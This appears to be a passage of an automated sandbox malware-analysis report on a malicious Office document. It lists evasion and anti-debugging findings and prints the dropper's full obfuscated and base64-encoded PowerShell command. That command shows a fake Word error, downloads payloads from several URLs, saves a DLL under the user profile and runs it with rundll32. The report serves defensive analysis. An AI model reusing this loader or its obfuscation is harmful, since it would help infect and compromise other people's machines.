Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002788DD rdtsc 7_2_002788DD
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer Jump to behavior
Source: powershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002788DD rdtsc 7_2_002788DD
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B50 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc, 7_2_10001B50
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029B5D0 mov eax, dword ptr fs:[00000030h] 7_2_0029B5D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029B6E0 mov eax, dword ptr fs:[00000030h] 7_2_0029B6E0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00917A60 RtlAddVectoredExceptionHandler, 7_2_00917A60

HIPS / PFW / Operating System Protection Evasion:

barindex
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SeT-itEm vaRIaBlE:w2HC ([tyPE]("{0}{2}{3}{1}" -f'sySt','rECtoRy','eM.io.','Di') ) ; sEt-item ("VAria"+"ble:"+"s"+"9n6") ( [type]("{4}{0}{7}{5}{8}{3}{6}{2}{1}"-f 'sTEm.n','ER','nag','ic','Sy','.','EPoiNtma','ET','Serv') ); $Rze8ms1=$L_7F + [char](64) + $Z40J;$U51B=(('I'+'86')+'Y'); $w2hC::"crEat`eDi`RectO`Ry"($HOME + (('Fp'+('fL'+'x8')+('o'+'0s'+'zFp')+('fGzta'+'zk')+('lF'+'p')+'f')-rEplaCE ('F'+'pf'),[ChAr]92));$Q81B=('X'+('4'+'_V')); $S9N6::"sEcur`i`TYpRo`TOcOL" = ('T'+('l'+'s12'));$P55L=(('I'+'_6')+'F');$Olvvwn6 = (('I'+'11')+'F');$I82O=('I'+('34'+'R'));$Uo7olue=$HOME+((('cH'+'q')+('Lx8'+'o'+'0s')+('zcH'+'q')+('Gzt'+'az')+('k'+'lcHq')) -ReplACE ([CHaR]99+[CHaR]72+[CHaR]113),[CHaR]92)+$Olvvwn6+('.d'+'ll');$S_6P=('R'+('51'+'N'));$Gt0es1u=(('A]'+'['+'q[D')+':/'+('/m'+'ai')+('l.'+'k')+'yo'+'j'+'in'+('c'+'ond')+'ui'+'t'+'s.'+('com/j'+'hgu'+'n')+('75'+'3')+('.zip@A]['+'q[D'+'://')+'a'+('ccur'+'at'+'ebc')+('.gr'+'/e0lw'+'3t.z'+'i')+('p@'+'A]')+'[q'+('[D'+':')+('//tu'+'mk')+('uv.o'+'r')+('g.tr/'+'z'+'d8')+'dx'+('b2u'+'.zi'+'p')+'@'+('A'+'][')+'q['+'D:'+'//'+'t'+'he'+('w'+'orldofjac'+'o'+'b.')+'c'+'om'+('/cjs'+'o')+('mlo'+'.zip@')+('A'+'][q')+'['+('D:/'+'/')+'e-'+('maco'+'m')+'.'+('c'+'om.')+('b'+'r/cl3')+'5'+('e0.zip'+'@A'+'][')+'q['+('D'+':/')+'/l'+('eg'+'i'+'on.s'+'er'+'iesn')+'ow'+('.we'+'b')+('sit'+'e')+'/q'+('3'+'3rv')+'2'+('.zi'+'p'))."re`pl`ACE"((('A]'+'[')+'q'+'[D'),([array](('d'+('s'+'ewf')),('w'+('evw'+'e'))),('ae'+'ff'),(('ht'+'t')+'p'))[2])."SPl`it"($K17P +
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded SeT-itEm vaRIaBlE:w2HC ([tyPE]("{0}{2}{3}{1}" -f'sySt','rECtoRy','eM.io.','Di') ) ; sEt-item ("VAria"+"ble:"+"s"+"9n6") ( [type]("{4}{0}{7}{5}{8}{3}{6}{2}{1}"-f 'sTEm.n','ER','nag','ic','Sy','.','EPoiNtma','ET','Serv') ); $Rze8ms1=$L_7F + [char](64) + $Z40J;$U51B=(('I'+'86')+'Y'); $w2hC::"crEat`eDi`RectO`Ry"($HOME + (('Fp'+('fL'+'x8')+('o'+'0s'+'zFp')+('fGzta'+'zk')+('lF'+'p')+'f')-rEplaCE ('F'+'pf'),[ChAr]92));$Q81B=('X'+('4'+'_V')); $S9N6::"sEcur`i`TYpRo`TOcOL" = ('T'+('l'+'s12'));$P55L=(('I'+'_6')+'F');$Olvvwn6 = (('I'+'11')+'F');$I82O=('I'+('34'+'R'));$Uo7olue=$HOME+((('cH'+'q')+('Lx8'+'o'+'0s')+('zcH'+'q')+('Gzt'+'az')+('k'+'lcHq')) -ReplACE ([CHaR]99+[CHaR]72+[CHaR]113),[CHaR]92)+$Olvvwn6+('.d'+'ll');$S_6P=('R'+('51'+'N'));$Gt0es1u=(('A]'+'['+'q[D')+':/'+('/m'+'ai')+('l.'+'k')+'yo'+'j'+'in'+('c'+'ond')+'ui'+'t'+'s.'+('com/j'+'hgu'+'n')+('75'+'3')+('.zip@A]['+'q[D'+'://')+'a'+('ccur'+'at'+'ebc')+('.gr'+'/e0lw'+'3t.z'+'i')+('p@'+'A]')+'[q'+('[D'+':')+('//tu'+'mk')+('uv.o'+'r')+('g.tr/'+'z'+'d8')+'dx'+('b2u'+'.zi'+'p')+'@'+('A'+'][')+'q['+'D:'+'//'+'t'+'he'+('w'+'orldofjac'+'o'+'b.')+'c'+'om'+('/cjs'+'o')+('mlo'+'.zip@')+('A'+'][q')+'['+('D:/'+'/')+'e-'+('maco'+'m')+'.'+('c'+'om.')+('b'+'r/cl3')+'5'+('e0.zip'+'@A'+'][')+'q['+('D'+':/')+'/l'+('eg'+'i'+'on.s'+'er'+'iesn')+'ow'+('.we'+'b')+('sit'+'e')+'/q'+('3'+'3rv')+'2'+('.zi'+'p'))."re`pl`ACE"((('A]'+'[')+'q'+'[D'),([array](('d'+('s'+'ewf')),('w'+('evw'+'e'))),('ae'+'ff'),(('ht'+'t')+'p'))[2])."SPl`it"($K17P + Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBlAFQALQBpAHQARQBtACAAdgBhAFIASQBhAEIAbABFADoAdwAyAEgAQwAgACgAWwB0AHkAUABFAF0AKAAiAHsAMAB9AHsAMgB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBzAHkAUwB0ACcALAAnAHIARQBDAHQAbwBSAHkAJwAsACcAZQBNAC4AaQBvAC4AJwAsACcARABpACcAKQAgACkAIAAgADsAIAAgACAAcwBFAHQALQBpAHQAZQBtACAAKAAiAFYAQQByAGkAYQAiACsAIgBiAGwAZQA6ACIAKwAiAHMAIgArACIAOQBuADYAIgApACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADQAfQB7ADAAfQB7ADcAfQB7ADUAfQB7ADgAfQB7ADMAfQB7ADYAfQB7ADIAfQB7ADEAfQAiAC0AZgAgACcAcwBUAEUAbQAuAG4AJwAsACcARQBSACcALAAnAG4AYQBnACcALAAnAGkAYwAnACwAJwBTAHkAJwAsACcALgAnACwAJwBFAFAAbwBpAE4AdABtAGEAJwAsACcARQBUACcALAAnAFMAZQByAHYAJwApACAAIAApADsAIAAkAFIAegBlADgAbQBzADEAPQAkAEwAXwA3AEYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFoANAAwAEoAOwAkAFUANQAxAEIAPQAoACgAJwBJACcAKwAnADgANgAnACkAKwAnAFkAJwApADsAIAAkAHcAMgBoAEMAOgA6ACIAYwByAEUAYQB0AGAAZQBEAGkAYABSAGUAYwB0AE8AYABSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBGAHAAJwArACgAJwBmAEwAJwArACcAeAA4ACcAKQArACgAJwBvACcAKwAnADAAcwAnACsAJwB6AEYAcAAnACkAKwAoACcAZgBHAHoAdABhACcAKwAnAHoAawAnACkAKwAoACcAbABGACcAKwAnAHAAJwApACsAJwBmACcAKQAtAHIARQBwAGwAYQBDAEUAIAAoACcARgAnACsAJwBwAGYAJwApACwAWwBDAGgAQQByAF0AOQAyACkAKQA7ACQAUQA4ADEAQgA9ACgAJwBYACcAKwAoACcANAAnACsAJwBfAFYAJwApACkAOwAgACQAUwA5AE4ANgA6ADoAIgBzAEUAYwB1AHIAYABpAGAAVABZAHAAUgBvAGAAVABPAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABQADUANQBMAD0AKAAoACcASQAnACsAJwBfADYAJwApACsAJwBGACcAKQA7ACQATwBsAHYAdgB3AG4ANgAgAD0AIAAoACgAJwBJACcAKwAnADEAMQAnACkAKwAnAEYAJwApADsAJABJADgAMgBPAD0AKAAnAEkAJwArACgAJwAzADQAJwArACcAUgAnACkAKQA7ACQAVQBvADcAbwBsAHUAZQA9ACQASABPAE0ARQArACgAKAAoACcAYwBIACcAKwAnAHEAJwApACsAKAAnAEwAeAA4ACcAKwAnAG8AJwArACcAMABzACcAKQArACgAJwB6AGMASAAnACsAJwBxACcAKQArACgAJwBHAHoAdAAnACsAJwBhAHoAJwApACsAKAAnAGsAJwArACcAbABjAEgAcQAnACkAKQAgACAALQBSAGUAcABsAEEAQwBFACAAKABbAEMASABhAFIAXQA5ADkAKwBbAEMASABhAFIAXQA3ADIAKwBbAEMASABhAFIAXQAxADEAMwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAE8AbAB2AHYAdwBuADYAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFMAXwA2AFAAPQAoACcAUgAnACsAKAAnADUAMQAnACsAJwBOACcAKQApADsAJABHAHQAMABlAHMAMQB1AD0AKAAoACcAQQBdACcAKwAnAFsAJwArACcAcQBbAEQAJwApACsAJwA6AC8AJwArACgAJwAvAG0AJwArACcAYQBpACcAKQArACgAJwBsAC4AJwArACcAawAnACkAKwAnAHkAbwAnACsAJwBqACcAKwAnAGkAbgAnACsAKAAnAGMAJwArACcAbwBuAGQAJwApACsAJwB1AGkAJwArACcAdAAnACsAJwBzAC4AJwArACgAJwBjAG8AbQAvAGoAJwArACcAaABnAHUAJwArACcAbgAnACkAKwAoACcANwA1ACcAKwAnADMAJwApACsAKAAnAC4AegBpAHAAQABBAF0AWwAnACsAJwBxAFsARAAnACsAJwA6AC8ALwAnACkAKwAnAGEAJwArACgAJwBjAGMAdQByACcAKwAnAGEAdAAnACsAJwBlAGIAYwAnACkAKwAoACcALgBnAHIAJwArACcALwBlADAAbAB3ACcAKwAnADMAdAAuAHoAJwArACcAaQAnACkAKwAoACcAcABAACcAKwAnAEEAXQAnACkAKwAnAFsAcQAnACsAKAAnAFsARAAnACsAJwA6ACcAKQArACgAJwAvAC8AdAB1ACcAKwAnAG0AawAnACkAKwAoACcAdQB2AC4AbwAnACsAJwByACcAKQArACgAJwBnAC4AdAByAC8AJwArACcAegAnACsAJwBkADgAJwApACsAJwBkAHgAJwArACgAJwBiADIAdQAnACsAJwAuAHoAaQAnACsAJwBwACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAnAEQAOgAnACsAJwAvAC8AJwArACcAdAAnACsAJwBoAGUAJwArACgAJwB3ACcAKwAnAG
